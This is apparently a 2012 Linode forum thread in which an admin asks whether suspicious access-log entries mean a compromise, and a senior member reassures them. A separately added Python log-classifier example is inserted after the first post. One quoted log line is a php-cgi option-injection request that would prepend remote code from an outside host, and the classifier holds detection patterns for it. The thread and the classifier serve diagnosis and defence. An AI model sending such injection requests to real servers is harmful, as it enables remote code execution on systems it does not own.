Linode Forum
Linode Community Forums
 Post subject: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 5:27 pm 
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
Hi all,

I've discovered some suspicious traffic that I'd like to ask about:


Code:
A. 91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"


Code:
B. 213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt


Code:
C. 65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"


1. My main concern is why B turned up in access.log rather than error.log. Does that mean it was successful?
Based on what I read across the forum, this is an injection attack or checking for an open proxy, correct?

2. How can I check if something like this was successful?

3. With Fail2Ban installed, is there a way to craft a RegExp to block such future requests?

4. URL C: it doesn't look like it got anything. Is this a normal request or something to protect against?

Thanks for any advice you may have.
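One way to work through question 2 (did the server actually do anything with a request like B?) over the three quoted lines. This is an added example, not code from the thread or from Linode: it parses Apache combined-format lines, tolerates the truncated line B, flags the php-cgi "-d" option pattern and the scanner user agent, and reports the status code next to what was attempted. The regex names, directive list and classification strings are my own choices.

```python
import re
# Apache "combined" access-log line. Status, size, referer and user agent are
# optional so a line cut off mid-request (like B above) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)"?'
    r'(?: (?P<status>\d{3}) (?P<size>\S+))?'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')
# php-cgi option injection: INI directives smuggled in as "-d" query options
# (the pattern in line B). Extend the directive list as needed.
PHP_CGI_OPTS = re.compile(
    r'[?+]-d(?:safe_mode|disable_functions|allow_url_fopen|allow_url_include'
    r'|auto_prepend_file)=', re.I)
SCANNER_UAS = ("Morfeus",)  # user-agent substrings of known mass scanners (line A)

def classify(line):
    """Return what the request tried (findings) and what the server did (outcome)."""
    m = LOG_RE.match(line)
    if not m:
        return {"verdict": "unparsed"}
    f = m.groupdict()
    findings = []
    if f["request"] and PHP_CGI_OPTS.search(f["request"]):
        findings.append("php-cgi option injection attempt")
    if f["ua"] and any(s in f["ua"] for s in SCANNER_UAS):
        findings.append("known scanner user agent")
    # access.log records every request the server handled, successful or not;
    # the status code is what says how it was handled.
    status = f["status"]
    if status is None:
        outcome = "truncated line, no status recorded"
    elif status[0] == "2":
        outcome = "served (2xx): check what the handling script returned"
    elif status[0] == "3":
        outcome = "redirected (3xx): only a redirect was sent"
    elif status[0] == "4":
        outcome = "rejected (4xx)"
    else:
        outcome = "server error (5xx)"
    return {"ip": f["ip"], "request": f["request"], "status": status,
            "findings": findings, "outcome": outcome,
            "verdict": "malicious" if findings else "benign"}
# The three lines quoted in the post (B is truncated exactly as quoted).
SAMPLE_LINES = [
    '91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"',
    '213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt',
    '65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"',
]
if __name__ == "__main__":
    for r in map(classify, SAMPLE_LINES):
        print(r["ip"], r["verdict"], r["findings"], r["outcome"])
```

For B the honest answer is that the quoted line is cut off before the status field, so the full entry in access.log has to be read to see whether a 200 or a redirect came back.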


 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 6:13 pm 
Senior Member

Joined: Tue May 26, 2009 3:29 pm
Posts: 1691
Location: Montreal, QC
This sort of thing (A and B) is common and normal; there's no need to take any specific action (and fail2ban isn't useful for this sort of thing unless they're hammering you). B probably didn't return any error because it's probably a valid request with invalid parameters; you probably do have /index.php, and your script is probably just ignoring the parameters.

For C, that looks like a completely normal web request. Somebody using Chrome tried to access your website. Why would you want to block it?


 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 6:25 pm 
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
Thanks for the reply Guspaz!

Yes, I do have index.php.

Well, I probably should have stated that I'm new to managing this aspect of a server, so I just wanted to check. You've definitely put me at ease though. In regards to C, I had figured that legitimate requests would have had more than '/' - something along the lines of B.


 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 7:07 pm 
Senior Member

Joined: Tue May 26, 2009 3:29 pm
Posts: 1691
Location: Montreal, QC
If they're accessing your site for the first time in a session, like at "http://mydomain.com", they don't have any extra parameters to pass.

A and B are definitely malicious traffic, but if you keep up to date with security updates, you should be fine.


 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 7:42 pm 
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
I update pretty well, so I guess that's covered.

